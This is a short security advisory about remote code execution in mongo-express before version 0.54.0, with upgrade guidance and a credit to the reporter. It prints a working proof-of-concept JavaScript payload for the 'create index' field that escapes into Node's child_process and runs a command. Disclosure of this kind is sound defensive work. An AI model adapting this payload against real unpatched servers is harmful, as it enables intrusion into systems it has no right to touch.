Remote code execution on the host machine by any authenticated user.
Launching mongo-express on a Mac and pasting the following into the “create index” field will pop open the Mac calculator:

```javascript
// The index field is evaluated as JavaScript rather than parsed as data. The expression
// walks from `this` up the prototype chain to the host realm's Function constructor,
// obtains the host `process` object, and from there loads child_process.
this.constructor.constructor("return process")().mainModule.require('child_process').execSync('/Applications/Calculator.app/Contents/MacOS/Calculator')
```
Users should upgrade to version 0.54.0.
Is there a way for users to fix or remediate the vulnerability without upgrading?
If you have any questions or comments about this advisory:
@JLLeitschuh for finding and reporting this vulnerability
| CPE | Name | Operator | Version |
|---|---|---|---|
| | mongo-express | lt | 0.54.0 |